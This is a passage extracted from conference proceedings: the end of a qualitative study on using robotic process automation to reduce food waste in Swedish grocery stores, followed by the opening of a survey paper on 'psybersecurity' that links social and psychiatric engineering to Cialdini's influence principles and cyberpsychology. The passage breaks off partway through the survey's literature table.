“It is definitely the fruit department that is at the top of the amount of wastage in our store. Then we usually compare it with other stores. For example, another store has
Robotic Process Automation for Reducing Food Wastage
887
a much better cold storage, then the fruit lasts longer compared to ours. But absolutely, the fruit department has a lot of waste but there are also good margins. The fruit is usually called the war treasury because we make the most money from it.” - R4. 4.4 Possibilities of Implementing RPA in Current Business Processes Respondents unanimously expressed that food wastage is a serious problem that grocery stores currently face. For example, one of the respondents discussed the problem, and the respondents’ company loses 30 000 SEK/month due to food wastage. “I would say that a normal month of food wastage is around SEK 30,000. And now during the summer, even more gets thrown away because the weather is so hot. The problem with our store is that they do not count on the purchase price from the supplier. Since they want to scare us, they count the price of food wastage for which we sell the product.” - R4. The solution proposed to reduce costs companies incur due to the loss of food wastage is lowering the price of items close to expiration. Checking the expiry date is manually done by employees. Information regarding expiry dates is found in the company’s information systems, but information regarding the current state of the food items needs physical investigation and updating current information manually. RPA soft bots are used in the workflow to expedite the process of expiry date checking and automatically track the time and set price. “One business process that I think RPA can be used in is when we receive the deliveries of goods. The different kinds of goods are separated in gray plastic crates with their own sticker on them, which shows the name of the product, expiration date and its barcode. We scan the barcodes when the delivery arrives and then the product is entered into the system. We base the price and number of goods that come with the delivery on previous sales figures and the margin on the obtained price from the supplier of the goods versus the sales price to our customers. You could certainly link RPA to it because each item comes with an expiration date and then the date of arrival of the delivery is also logged. Afterwards, the robot will be able to sense it and set a timer, and count the number of goods sold on that batch and lower the price close to the expiration date if needed. Then maybe it can also give us a notification with information of which goods need new price tags” - R2. Another interesting way of reducing food wastage is using near-expiry food for charity. One of the respondents’ grocery store donates near-expiry food to the homeless. This is not specific to RPA and automation. However, it is still worth mentioning the company is contributing to the environment. “We have grilled sausages and stuff. We throw these away at the end of the day and when they start to look bad. Then we also have buns and bread and things that we bake in the morning and toss at the end of the day. These are difficult goods to handle because you want a set of these goods available to sell all the time and it is difficult to calculate exactly how much we should bake or cook.” - R3. “In the pre-store we usually don’t have specific routines for date checking goods. We make sure that the ones with lower expiration dates are placed at the front so they are bought first. I know that those out on the floor lower the price and sell it for a lower
888
L. Leffler et al.
price in a special cooler. Unless the amount of goods is large enough to just keep them where they are usually placed in the store and put the discount price tag there”. - R1. “We date check goods manually and use red stickers with a discount price that we put over the regular price sticker of the goods that are about to expire.” - R6. “The bread department has a routine for food waste. We have a guy who usually comes and gathers bread in the morning. Instead of wasting it, I think he picks it up to give to the homeless. It’s nothing old and moldy really, but bread we simply cannot sell.” - R6. ”The thing that I think is good about the bread is that instead of throwing away food that should actually be thrown away, we could be giving it out so people can take advantage of it, which I think is great. Actually, the company will lose out on that economically, but there are so many others who benefit from it. In that way, it gives us a good reputation and an opportunity to use food waste for something good.” - R6. Most respondents explained that the date of expiry is checked manually by checking the dates on the goods themselves on the shelves. Respondents R1 and R6 use new price stickers for nearly expired goods to sell them more quickly. It is also interesting to find out that the companies are willing to intervene and handle environmental and economic issues. There is a problem with managing food wastage regarding fresh and unpacked foods, such as fruit and vegetables, resulting from external factors such as weather, storage condition, and transportation trucks. 4.5 The Necessity of Physical Work in Certain Monotonous Tasks Grocery stores are characterized by monotonous tasks such as replenishing items on the shelf, which could take an entire workday, even days. RPA can help reduce food wastage by sending information regarding expiring items to the deciding body for the price reduction. For example, one of the respondents said that the automated implementation could be included in a workflow if the solution could send out information about items that need removal or price reduction. “It would be easier [with automation], if you could get any notification in someway on the checkout screen saying something like “today these products are expiring, check them out”. Then you do not have to look at all the goods in the entire store to know which goods need to be thrown away. This partly helps the staff, and the store will also look fresher because then the customers do not have to look at the dates on the goods either.” - R3. ”Even if [RPA] sometimes will have problems, it will still help us in the end. If it works like it should it would be great. But I think it requires further developments before you could fully trust it. It would however still be helpful in the meantime.” - R5.
5 Discussions and Conclusions This study aimed to identify the advantages and disadvantages of implementing RPA technology to improve the workflows in grocery stores to help them reduce food wastage. In this study, we collected data using semi-structured reviews and thematic analysis to answer the research question. We identified a list of advantages and challenges of
Robotic Process Automation for Reducing Food Wastage
889
adopting RPA in grocery stores, as presented in Sect. 4, and a summary of the result is presented in this section in comparison with identified existing literature. 5.1 Identified Advantages of Adopting RPA The identified advantages of adopting RPA in grocery stores can be categorized into two categories: the advantages to the employees and the advantages to grocery stores. Employees will have more time to focus on creativity as RPAs aid tedious and repetitive tasks. Also, employees will have a better work environment with less stress, while RPAs do monotonous and daunting tasks. On the other hand, [8] states that RPA does the repetitive tasks that employees perform. According to [3], the major advantages of adopting RPA in organizations are cost reduction, speed of process execution, productivity, accuracy, compliance, flexibility, scalability, and removal of non-value-adding processes. The identified advantages of adopting RPA are to reduce food wastage: it is relatively cheap and easy to adopt RPA for grocery stores, RPAs can be used to help improve the time it takes to check expiry dates of packed foods with better speed and accuracy, a grocery store will have healthy and fresh food in stock, RPA improves the process of setting new prices to that packed food whose expiry dates are nearing to data, and finally RPAs improves workflows better to enable to focus on value-generating processes such as sales. 5.2 Identified Challenges of Adopting RPA In this section, we present the identified challenges of adopting RPA from the perspectives of grocery stores and their employees. Employees fear losing their jobs if RPA is adopted to automate workflows. Human intervention is needed in most workflows, so employees are required to get training, or grocery stores may need to hire experts. Similarly, [3] presented that employees fear losing their jobs to soft robots as robots perform faster with more consistency. Also, RPA is not suitable for a highly complex process as it incurs higher automation costs [14]. The identified challenge grocery stores face if they adopt RPA to reduce food wastage is human intervention is required in most workflows. Thus, grocery stores may be required to train their staff or even hire new technically skilled employees. According to the respondents, the other challenge is that RPA is a relatively new technology. Thus, grocery stores do not fully trust them; RPAs are not fully developed, and managers of grocery stores could lose confidence. Identification and prioritization of workflows and tasks to be automated is not an easy task, and balancing between automated and manual tasks needs optimization. RPA is affected by erroneous data entry, cash register problems, and theft. So, RPA could mishandle erroneous data, while a human could quickly identify erroneous data. The challenges identified in the literature are RPAs are not suitable for complex automation as they may incur higher costs. For example, [14] recommend that 30% of the job should be done by human interaction while 70% is automated for the productive implementation of RPA. Employees fear losing their jobs to robots as robots perform the
890
L. Leffler et al.
process faster and more consistently [3]. RPA is not a cognitive solution for computerdriven processes [12]. RPA cannot learn from experiences and is only used to mimic how a human would perform the task in a usual routine fashion [12]. 5.3 Limitations Our study focuses on the Swedish grocery store that is based in Stockholm. Even if the study location is limited to only one city, we believe that the results of this study are more or less generalizable to Swedish grocery stores. Besides, we have used purposive sampling to select knowledgeable respondents, as [16] suggested. However, the results of this study could be far from generalizable to other European cities and non-European cities. The transferability of research is about applicability, generalizability, and external validity [22]. Also, Ruona [23] states that external validity is related to the generalizability of the result to real-world problems and settings. The result of this study is limited in terms of transferability. For example, this study is limited to Swedish grocery stores. Thus, the results are far from applying to other types of organizations. 5.4 Concluding Remarks and Future Directions We investigated the implications of adopting RPA technology to help grocery stores in Sweden reduce monotonous tasks, reduce food wastage, and streamline their workflow. Doguc [7] distinguishes between RPA and Business Process Management (BPM) as BPM orchestrates operational business processes to expedite efficient workflows by integrating data, systems, and users, while RPA is used to carry out tasks as employees would but at a record time. However, BPM and RPA do not conflict even though both are designed to optimize processes [7]. Our result indicates that grocery stores could be reluctant to adopt RPA because they are unsure whether RPAs are fully developed. The fear of adopting RPAs could be attributed to the perception of employees and grocery stores that RPAs may disrupt their business process management and cost them and disrupt their business processes. RPAs are relatively new software applications to automate repetitive and rule-based tasks mostly, and we suggest that we should advocate best practices. Mungla [3] suggests six best practices while adopting RPAs. These best practices are: prioritizing the best-suited RPA use cases, determining return on investment expectations, defining governance structures, selecting the best RPA tool available, re-engineering processes to maximize the benefits of using RPAs, and enabling profound collaboration between IT and the business. Our result indicates that one of the challenges of adopting RPAs is optimizing and identifying automation tasks, particularly in grocery stores, to reduce food wastage. Similarly, [13], from the analysis of case studies conducted on different types of businesses, concluded that companies must continuously monitor their workflows or processes to identify and optimize suitable processes or tasks for RPA as all kinds of processes cannot be automated. Besides, [14] claims that 70% of the tasks should be automated while 30% should involve human interaction. Therefore, future studies could include identifying workflow tasks for automation and manual work for best performance in grocery stores
Robotic Process Automation for Reducing Food Wastage
891
to support food waste reduction and optimize RPA usage for grocery stores. For example, future studies may include identifying relevant processes or tasks to be automated and optimization strategies for grocery stores. Finally, we learned that the discussion about the automation of monotonous tasks could evoke emotions such as skepticism from employees who are not familiar with the subject and only have a general knowledge of automation. This made it easier to be more nuanced when debating whether RPA is worth testing in the supply chain. We believe that RPA should be introduced to grocery stores and other types of companies to increase their revenues while decreasing costs. Two of the respondents expressed fear and one of them expressed hesitancy about adopting RPAs even if they want to try RPAs. Yet, the advantages of adopting RPA outweigh the disadvantages. For example, companies will have increased revenues as food wastage reduction results in a decreased cost for them. Also, improved workflows, increased revenue, increased scalability, decreased stress on employees, increased employee productivity, reduced monotonous manual tasks, and improved work environment are the most significant advantages of adopting workflow in a grocery store.
References 1. Naturvårdsverket Etappmål för förebyggande av avfall (2020). http://www.naturvardsve rket.se/upload/miljoarbete-i-samhallet/miljoarbete-i-sverige/regeringsuppdrag/2020/redovi sning-ru-etappmal-forebyggande-avfall.pdf. Accessed 17 May 2021 2. Mullick, S., Raassens, N., Haans, H., Nijssen, E.J.: Reducing food waste through digital platforms: a quantification of cross-side network effects. Ind. Mark. Manage. 93, 533–544 (2021) 3. Mungla, B.O.: Robotic process automation for inventory control and management: a case of Freight Forwarders Solutions (Doctoral dissertation, Strathmore University) (2019) 4. Booker, Q., Munmun, M.: Industry RPA demands and potential impacts for MIS and related higher education programs (2022) 5. Annosi, M.C., Brunetta, F., Bimbo, F., Kostoula, M.: Digitalization within food supply chains to prevent food waste. In: Drivers, Barriers and Collaboration Practices, vol. 93, pp. 208–220. Industrial Marketing Management (2021) 6. E-Fatima, K., Khandan, R., Hosseinian-Far, A., Sarwar, D., Ahmed, H.F.: Adoption and influence of robotic process automation in beef supply chains. Logistics 6(3), 48 (2022) 7. Doguc, O.: Robot process automation (RPA) and its future. In: Research Anthology on CrossDisciplinary Designs and Applications of Automation, pp. 35–58. IGI Global (2022) 8. Hofmann, P., Samp, C., Urbach, N.: Robotic process automation. Electron. Mark. 30(1), 99–106 (2019). https://doi.org/10.1007/s12525-019-00365-8 9. McAbee, J How to Use Data to Drive Automation and Remove Repetitive Tasks (2020). https:// www.wrike.com/blog/data-drive-automation-remove-repetition/. Accessed 05 June 2021 10. Hitomi, K.: Automation—its concept and a short history. Technovation 14(2), 121–128 (1994) 11. Tripathi, A.M.: Learning Robotic Process Automation: Create Software Robots and Automate Business Processes with the Leading RPA tool–UiPath. Packt Publishing Ltd., Birmingham (2018) 12. Gami, M., Jetly, P., Mehta, N., Patil, S.: Robotic process automation–future of business organizations: a review. In: 2nd International Conference on Advances in Science & Technology (ICAST) (2019)
892
L. Leffler et al.
13. Osman, C.C.: Robotic process automation: lessons learned from case studies. Informatica Economica 23(4), 1–10 (2019) 14. Lamberton, C., Brigo, D., Hoy, D.: Impact of robotics, RPA and AI on the insurance industry: challenges and opportunities. J. Finan. Perspect. 4(1), 1–13 (2017) 15. Nascimento, A.M., Queiroz, A., de Melo, V.V., Meirelles, F.S. Applying artificial intelligence to reduce food waste in small grocery stores (2022) 16. Denscombe, M.: The Good Research Guide for Small Scale Research Projects, 4th edn. Open University Press, Buckingham (2010) 17. Denscombe, M.: The Good Research Guide: For Small-Scale Social Research Projects, 5th edn. Open University Press, London (2014) 18. Braun, V., Clarke, V.: Using thematic analysis in psychology. Qual. Res. Psychol. 3(2), 77–101 (2006) 19. Braun, V., Clarke, V.: Evaluating and reviewing TA research: A checklist for editors and reviewers. The University of Auckland, Auckland (2017) 20. CDC Centers for Disease Control and Prevention Workplace Health Model; Increase Productivity (2015). https://www.cdc.gov/workplacehealthpromotion/model/control-costs/benefits/ productivity.html. Accessed 30 Aug 2021 21. Teunissen, T.: Success factors for RPA application in small and medium sized enterprises (Bachelor’s thesis, University of Twente). (2019) 22. Guba, E.G.: Criteria for assessing the trustworthiness of naturalistic inquiries. Educ. Tech. Res. Dev. 29(2), 75–91 (1981) 23. Ruona, W.E.: Analyzing qualitative data. Res. Organ. Found. Methods Inq. 223(263), 233–263 (2005)
A Survey Study of Psybersecurity: An Emerging Topic and Research Area Ankur Chattopadhyay(B) and Nahom Beyene Northern Kentucky University, Highland Heights, KY 41076, USA [email protected]
Abstract. When studying cybersecurity, the emphasis is generally given the personal information protection and the safeguarding of the technology on which the information is stored. Cybersecurity attacks, which can occur in multiple forms, can seriously affect the involved stakeholders mentally, and this impact aspect tends to be underestimated. With the human mind being a significant attack target, psybersecurity has begun gaining prominence as an important field of study. In this survey paper, we explore psybersecurity as an emerging interdisciplinary area within the human security domain of cybersecurity and conduct a detailed study of its causes plus effects. We discuss existing research work, which is relevant to this field of psybersecurity, and present a nifty organization of the surveyed literature, which is classified into three notable categories. With psychiatric engineering gaining prominence as a new impactful attack vector, a psybersecurity attack (PSA) primarily targets the human mind. We study the relations between cybersecurity and cyberpsychology, as well as between psychiatric engineering (PE) and social engineering (SE) from an interdisciplinary perspective. We perform a unique analysis of both PE and SE as PSA, linking them to Cialdini’s six principles and their associated elements, as causes for PSA. We then show how to connect these causal components of PSA to the eight cyberpsychology dimensions through a tabular map that we have developed. We also discuss the emergence of COVID-driven PSA with a focus on the psybersecurity of online healthcare information (OHI) users, including potential ways of protecting the users of OHI from the increase of psybersecurity threats. We conclude this survey study by looking at the potential scope of future work in psybersecurity, including new research directions and open problems plus research questions. Keywords: Cybersecurity · Psybersecurity · Attacks · Cialdini’s principles · Cyberpsychology · COVID · Survey study · Emerging
1 Introduction, Scope and Motivation The increased conveniences come with multiple security risks with the rise of technology in every facet of daily life. When imagining cybersecurity, traditionally the focus is on protecting personal information and guarding the technology that contains this information. However, cyber-attacks, which can come in various forms, can target things beyond the obvious and can cause damage to the mental health of the victims, in addition to © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 893–912, 2023. https://doi.org/10.1007/978-3-031-28073-3_59
894
A. Chattopadhyay and N. Beyene
hacking the victim’s data, systems and technologies. Psybersecurity refers to the subject of securing mental well-being that includes the study of the best practices around balancing preservation plus protection of the mind’s health, as well as a study of the psychiatric consequences of technology usage combined with the effects it has on human security [1, 11, 40–43]. Psybersecurity attacks (PSA) can impact the mental health of victims by changing the mental setup, including mood, emotion, and behavior. Given that the target in PSA is primarily the human mind, their impact is quite significant. Psybersecurity is an emerging topic within the domain of human security. It has plenty of scope for future work, as there has not been much research work performed in this area [1, 11, 40]. In this paper, we perform a survey study of existing literature, which is related to the interdisciplinary area of psybersecurity. We study different relevant publications and classify them into three notable categories, as shown in Fig. 1, which summarizes a noteworthy contribution of our survey study. Figure 1 is further discussed and explained later in detail in Sect. 5 of this paper. Moreover, this research study analyzes both psychiatric engineering (PE) [1, 41–43] and social engineering (SE) [6, 12, 29] as PSA, linking them to Cialdini’s principles of persuasion (or influence) [3–5] and their associated causal elements. We then exhibit how these causal components of PSA are connected to the cyberpsychology dimensions [10]. This unique analysis work is shown in Fig. 2, which represents another notable contribution of our study. Figure 2 is further discussed and explained later in detail in Sect. 6 of this paper. These two highlighted results (as seen in Fig. 1 and 2) from our work are meant to be meaningful references for the community, including individuals, who are interested in learning about psybersecurity, and researchers, who are working in this area, or who wish to study the related scholarly works in this field of psybersecurity. They represent unique, original contributions from our study, which leads to a multi-layered survey of psybersecurity, involving important literature on this subject area and other related topics. In overall summary, this survey study addresses the following research questions: Research Question 1: What are the relevant published works on and around the topic of psybersecurity? Research Question 2: How to classify the psybersecurity topic related literature using meaningful categories? Research Question 3: What are the causal elements of psybersecurity attacks (PSA)? Research Question 4: How are the causal components of psybersecurity attacks (PSA) connected to Cialdini’s principles of influence? Research Question 5: How are the causal components of psybersecurity attacks (PSA) related to the architectural dimensions of cyberpsychology? Research Question 6: What is the relationship between cybersecurity and psychology? Research Question 7: What is the relationship between psychiatric engineering (PE) and social engineering (SE)? Research Question 8: What are the impacts of psybersecurity attacks (PSA)? Research Question 9: What are the prospective open research questions and potential future directions of work in the emerging, interdisciplinary field of psybersecurity? In this paper, we also explore the relationship plus connections between cybersecurity and psychology, as illustrated in Table 1, which is listed next. Additionally, we explore the
A Survey Study of Psybersecurity
895
Fig. 1. This is a summarized diagram of the publications we surveyed along with the three classification categories used. The numerical figure within parentheses against each category stands for the number of publications surveyed in that category
Fig. 2. This summarizes our performed analysis of PSA using PE and SE, thus linking PSA to Cialdini’s principles of influence [3–5] plus their causal components, and thereby connecting psa to the eight cyberpsychology dimensions [10]
relationship plus connections between PE and SE from an interdisciplinary perspective. We project PE as an attack vector, that banks on disrupting an individual’s health and in which the psychiatric part focuses on the diagnosis, treatment, and prevention of mental, emotional, and behavioral disorders. It is to be noted that we mainly focus on the interdisciplinary works on SE that include a cyberpsychology viewpoint. We aim to explore how PE and SE are linked and related to PSA from the cyberpsychology standpoint. We look to lay a foundation for researchers, who are interested in exploring these intersections. To our knowledge, there has been no prior detailed survey study or previous system of knowledge paper on this emerging area of psybersecurity, as well as the interdisciplinary topics around this subject matter. We attempt to fill this research gap through this paper by carrying out a first-of-its-kind survey study on psybersecurity related topics.
896
A. Chattopadhyay and N. Beyene Table 1. This summarizes the relationship between cybersecurity and psychology
Cybersecurity
Psychology
Is the protection of information/data, assets, services, and systems of value to reduce the probability of loss, damage/corruption, compromise, or misuse to a level commensurate with the value assigned [31]
The scientific study of mind and behavior [33, 37, 39]
The use of psychological manipulation to trick people into disclosing sensitive information or inappropriately granting access to a secure system [32]
Cognitive psychology involves studying internal mental processes - things that go on inside your brain, including perception, thinking, memory, attention, language, problem-solving, and learning [34]
2 Causes of Psybersecurity Attacks (PSA) 2.1 PSA Attack Vectors • Attack vectors are methods cybercriminals use to gain unauthorized access to a system [7, 8, 30, 31]. – Psychiatric Engineering (PE): It is an attack vector that relies heavily on an individual’s health and in which the psychiatric part focuses on the diagnosis, treatment, and prevention of mental, emotional, and behavioral disorders [1, 41–43]. Existing literature associates PE with the potential threat of a psybersecurity attack (PSA). This threat is described as one that can severely impact a victim’s mental health through a carefully engineered PSA. For example, a PE who is carefully engineered to manipulate an individual’s mind results in the misunderstanding of symptoms and leads to an altered psychiatric evaluation, and an altered psychiatric assessment. This results in the wrong and unfair treatment. A psychiatric care provider can be misled by a victim being provided with a proper diagnosis and without knowing becomes part of a well-orchestrated PE attack (for causing mental harm by manipulating the victim’s mind) through a misguided treatment process (Fig. 3). PE can be compared as a PSA, and related to common SE attacks of the human mind’s flaws, weaknesses and the manipulative tactics is in terms of the attacker’s awareness to exploit victims. • Social Engineering (SE): Human interaction relies heavily on an attack vector and involves manipulating people into breaking standard security procedures, often. The best practices to gain unauthorized access are to the systems, networks, or physical locations or for financial gain [6, 12, 15, 30]. To conceal their identities and motives, threat actors use social engineering techniques and present themselves as trusted individuals or information sources. The objective behind this is to influence, manipulate or trick users into releasing sensitive information or access within an organization. Many SE exploits rely on people’s willingness to be helpful or fear punishment [13,
A Survey Study of Psybersecurity
897
Fig. 3. This diagram outlines the schematic process of PE, as cited in references [1, 41, 42]
14, 23]. We study and analyze both PE and SE, thus probing into their relationships and connections, as summarized in Table 2, which is listed next. Table 2. This summarizes the relationship between PE and SE Psychiatric Engineering (PE)
Social Engineering (SE)
Is an attack vector that relies heavily on an individual’s health and in which the psychiatric part focuses on the diagnosis, treatment, and prevention of mental, emotional, and behavioral disorders This concept of a PE is distinct from a technologically orchestrated social engineering attack
Is an attack vector that relies heavily on human interaction and often involves manipulating people into breaking standard security procedures and best practices to gain unauthorized access to systems, networks, or physical locations or for financial gain. Both PE and SE have common links to psychology and behavioral sciences
2.2 Attack Target We next discuss the “people problem” concerning cybersecurity. Cybersecurity defenses and attack methods are evolving rapidly, but not humans. Therefore, nearly all cyberattacks are based on exploiting human nature, and this is the “people problem”. A targeted attack is any malicious attack that is targeted at a specific individual, company, system, or software. It may extract information, disturb operations, infect machines, or destroy data on a target machine [7, 8, 30, 31]. For cybercriminals, targeting people makes sense. It’s faster, easier, and more profitable than targeting systems. In addition, attackers exploit human nature with diversionary tactics, such as creating a false sense of urgency or impersonating trusted people. Individuals with different personalities do vary in the degree to which they may fall prey to social or psychiatric engineering manipulations.
898
A. Chattopadhyay and N. Beyene
2.3 Ciaidini’s Principles of Psychiatric and Social Engineering While examining the manipulation methods employed by cybercriminals or hackers, the works of Dr. Robert Cialdini [3–5] come into focus and are never too far from view. Cialdini is recognized worldwide for his inspiring research on the psychology of influence. His seminal work on “Influence: Science and Practice” identifies and describes six (6) principles that influence the behavior of others. These are well-known as the Principles of Liking, Social Proof , Rule of Reciprocation, Commitment and Consistency, Authority, and Scarcity. Cialdini’s first principle of liking refers to the fact that people are more likely to comply with requests made by people they like and is associated with the mirroring effect when dealing with the psychiatric parts. Mirroring is a subconscious occurrence that can create a feeling of comfort that forces us to get attracted to people like us. When employed consciously, it plays a massive role in getting to know someone and establishing a level of comfort with one another [19, 27]. It is associated with Physical Attractiveness, Similarity, Compliments, Contact and Cooperation, plus Conditioning and Association. The social engineering part of the person-to-person interaction has a significant role to play here. Attacks under “person-to-person social engineering” involve the victim and the attacker interacting directly or in person. The attacker uses deceptive techniques to prey on the victim’s gullibility or behavioral weakness and abuses the victim’s confidence [13]. The second principle is that of social proof , which implies that people tend to have more trust in things that people endorse that they trust. The psychiatric side of social proof is well explained in the bandwagon effect, a psychological phenomenon in which people do something primarily because other people are doing it, regardless of their beliefs, which they may ignore or override. Social Proof is the tendency of people to align their thoughts and behaviors with a group, also called a herd mentality. For example, advertisers often tell us that their product is the “largest selling” car, an album, to get us to trust them [23, 25]. On the social engineering side, all attack vectors, which do not involve the physical presence of the attacker, are categorized as Person-Person via media attacks. Text, voice, and video are the three types of media considered for the taxonomy [15]. The third principle is that of the rule of reciprocation, in which people feel obligated to pay back what they have received from others. The rule of reciprocation has three main psychological terms intention, empathy, and credibility. For a kind, sound, and helpful gesture to be credible, a person must perceive it as a clear intention to do good. There mustn’t be a hidden interest behind it. Likewise, people must feel empathy, as only in this way will they be able to build the basis of a reciprocal deed. Similarly, far from being false, reciprocity impacts the other because it is credible. Reciprocity would not be so significant without the three factors, which are discussed next [17, 20]. The first factor is generalized reciprocity, which involves exchanges within families or friends. The next factor of balanced reciprocity consists of calculating the exchange’s value and expecting the favor to be returned within a specified time frame. The third and last factor of negative reciprocity happens when one party involved in the business tries to get more about it than the other. The classic scheme of “something for something” is well-known [13, 14]. In social engineering, a quid pro quo exchange manipulates a person’s desire
A Survey Study of Psybersecurity
899
to reciprocate favors. Quid pro quo attacks are based on manipulation and abuse of trust. They fall within SE, such as phishing (including spear phishing and whaling attacks), baiting, or pretexting [24]. The fourth principle is that of commitment and consistency; according to which people tend to stick with whatever they’ve already chosen. The concept in psychology explains that this is confirmation bias, which is the tendency to look for information that supports, rather than rejects, one’s preconceptions, typically by interpreting evidence to confirm existing beliefs while rejecting or ignoring any conflicting data [21, 27]. One standard method is for the attacker to pretend he is new to the system and needs assistance gaining access. The role of a new person (or ‘newbie’ or ‘neophyte’) is easy for a potential hacker to pull off. The hacker can easily pretend not to know much about a system and still retrieve information. This ruse is commonly used when the attacker cannot research enough about the company or find enough information to get a foot in the door [29, 30]. The fifth principle is that of authority, where people follow others, who appear to know what they are doing. Judgment heuristics means using the most straightforward method or way to answer or approach something and complying with what is available. We can take Asch and Milgram’s experiments as an example. The importance of people surrounding them in the decision-making process has been tried in this experiment. A table is surrounded by the participants; among them are the actors who are hired by the researchers; the main subject sits at the end of the table. However, the main issue is unaware that it was the only subject in this experiment. After the experiment starts, four lines are shown to the participants, one on the left and three on the right. Then they are asked which line is the equal length of the line on the left side from the right side. In the first two rounds, the actors give the correct answer, and when it comes to our actual subject, he also gives the correct answer. After the third round, the actors confidently start giving the wrong answers. Although some topics did not work with the group at first and produced correct answers, it was observed that the actors’ authentic expressions changed, as they felt obliged to adhere to the group. The reason why the subjects felt the need to adapt was also criticized by researchers. Some researchers argue that people do this not because they desire to adapt to the group, but because they focus on avoiding conflict [28]. Executives respect authorities such as legal entities. In a wellknown whaling attack, many executives were tricked into opening infected PDF files, that looked like official subpoenas [15, 29]. The last principle is that of scarcity, in which people are always drawn to things that are perceived to be exclusive. Social engineers may use scarcity to create a sense of urgency in decision-making. This urgency can often lead to manipulating the decisionmaking process, allowing the social engineer to control the information provided to the victim. “Only five items left in stock!” is one of the most common examples [29, 30]. People value their freedom, and reactance theory emphasizes this simple but significant fact. When this freedom of choice is threatened, people tend to engage in motivated behavior for taking actions to reassert and regain that freedom, forcing them to act in a certain way, even if they don’t want to [18, 25]. Overall, in this section, we discuss the renowned Cialdini’s principles, which are typically and traditionally associated with SE attacks, as we intend to explore these principles as elements that are also related to PE attacks, given that they can be linked
900
A. Chattopadhyay and N. Beyene
to PE. In summary, as we further study the anatomy of PSA, which can be in the form of PE and SE attacks, we need to consider Cialdini’s principles and use them to analyze causal reasons behind a potential PSA. After this causal analysis of PSA, we next take a look at the effects of PSA - the aftermath.
3 The Effects of Psybersecurity Attacks (PSA) “Psybersecurity” is the sparsely used term in the existing literature [1, 11, 40–43], but the threat to mental health i.e., the risk of disruption to psychological well-being of a victim existed since cybersecurity attacks have been around. The Association for Psychological Sciences explains that human behavior and technology, both are equally centralized in cybersecurity attacks, and therefore, the hackers consider different psychological aspects of the people they attack. The current literature situation discloses that individuals with higher aggression, depression, or anxiety are the top-most targeted people. Such peoples are more endangered of cyber-attacks given their volatile mental states and fallible dispositions. Studying the factors behind their risky and insecure behavior can help us understand the impact attacks can have on them. People with mental illnesses might have a higher vulnerability to cybercrimes. This particular group includes individuals with severe psychiatric conditions and senior citizens, who have become victims of several kinds of online financial fraud, hacking and other cybercrimes that have caused financial problems and led to mental stress. Some mental illnesses include Emotional Trauma, Guilt and Shame, Feelings of Helplessness, Eating Disorders, and Sleep Disorders [5, 8]. In addition, as individuals increasingly engage with the world through technology, research on online behavior has also increased. There have been investigations on how people behave in cyberspace versus face-to-face and on the relationship between personality characteristics and a range of online behavior, such as social media preferences and use, dating activity, cybersecurity measures, and online bullying. In short, our survey work on existing research literature related to the impact of cyber-attacks [5, 8, 36] has led us to noteworthy findings that can be summarized into the following list, which we sum up as potential effects of PSA: • • • • •
Mental illnesses like Emotional Trauma, Guilt, Shame, Feelings of Helplessness Eating and Sleep Disorders, plus Stress Vigilance Disrupts Personality Transformations Culture Impacts.
4 Cyberpsychology and its Dimensions Earlier in Sect. 1 of this paper, we discussed the relationship between cybersecurity and psychology, as noted in Table 1. We now explore the confluence of these two topics in an intersectional context as cyberpsychology, in follow up to our earlier section. When interacting with online devices, we extend our psyche or persona to them. Thus, they reflect our personalities, beliefs, and lifestyles. The online world blurs the barrier
A Survey Study of Psybersecurity
901
between mind-space and machine-space [10, 36]. We also experience this as being between ourselves and the non-self. It serves as a venue for discovering our identity, interests, desires, expressions, creativity, and aggressive or addictive acts in negative cases. Suler outlines eight dimensions of cyberpsychology architecture (as displayed in Fig. 4), that help define our interactions with virtual spaces [10]. These dimensions are Identity, Social, Interactive, Text, Sensory, Temporal, Reality, and Physical. Figure 4 below lists these dimensions and highlights them as a reference framework for our survey study.
Fig. 4. This lists the eight (8) dimensions of cyberpsychology, as described in reference [10]
5 Summarizing and Classifying Literature: Survey Study Results 1 We now reach the section of this work, where we describe a significant contribution plus the first set of noteworthy results from our survey study. One of the first and foremost contributions of this paper is the listing plus discussion of existing literature, which is relevant to the interdisciplinary area of psybersecurity. We study several related publications and classify them into three notable categories, as seen earlier in the form of Fig. 1 in Sect. 1 of this paper. Figure 1 visually depicts and summarizes the main contribution of our work. We now discuss further details from the information viewpoint of Fig. 1. We next present the main contributions of these surveyed publications in chronological order, starting from the latest published works (going by the year of publication) in Table 3. This table represents one of the main outcomes of our survey study. It lists the different instances of related literature surveyed by us and describes each of these cited references, as well as classifies each into one or more of the following three (3) categories: psybersecurity related, social engineering focused and cyberpsychology themed. Table 3, as shown next, is a highlight of this paper, and a notable contribution to our survey study.
902
A. Chattopadhyay and N. Beyene
Table 3. This showcases a detailed description and classification of the publications surveyed and cited by us, with category 1 as Psybersecurity Related, category 2 as Social Engineering Focused, and category 3 as Cyberpsychology Themed. An ‘x’ mark indicates that a surveyed and cited publication ‘belongs to the corresponding category 1, 2 or 3’ Cited reference
Publication year
Description of work
1
2
3
[20]
2022
Discusses the answer to the following research question: Why do we feel compelled to return favors?
[24]
2022
Defines and discusses quid pro quo attacks
[34]
2022
Describes how cognitive psychology is the science of how we think
x
[26]
2022
Shows what mirroring is and explains reactance theory better
x
[29]
2022
Provides social engineering related info and educational resources
[1]
2021
Briefly discusses psybersecurity as an emerging topic, and explains how it is connected to social engineering plus behavioral sciences
[6]
2021
Provides a detailed definition and description of social engineering
[17]
2021
Explains and discuss the laws of psychological reciprocity
x
[22]
2021
Discusses why cognitive biases and heuristics lead to an under-investment in cybersecurity
x
[28]
2021
Describes Asch and Milgram’s experiments in social psychology
x
[27]
2020
Discusses how confirmation bias works
x
[41–43]
2020
Introduces the topic of psybersecurity and explains the relationship between mental health and cybersecurity
x
x
x
x
x
x
x
x
(continued)
A Survey Study of Psybersecurity
903
Table 3. (continued) Cited reference
Publication year
Description of work
1
2
3
[11]
2020
Briefly introduces the concept of x psybersecurity as the intersection between computer security and psychology
[36]
2020
Discusses human cognition through the lens of social engineering
[9]
2020
Discusses the impact of the COVID pandemic on cyber psychological issues like cyberchondria and other health anxiety
x
[38]
2020
Discusses the driving forces of unverified information (COVID infodemic roots) and cyberchondria during the COVID pandemic
x
[8]
2019
Explains why humans are a growing target for cyberattacks and what to do about them
x
[23]
2019
Discusses the relation between social engineering and exploitation development
x
[21]
2018
Discusses Cialdini’s book on his six principles of influence
[40]
2017
Explains the term psybersecurity and discusses the relationship between hacking and behavioral sciences
[12]
2017
Describes social engineering using the Kali Linux operating system
[33]
2017
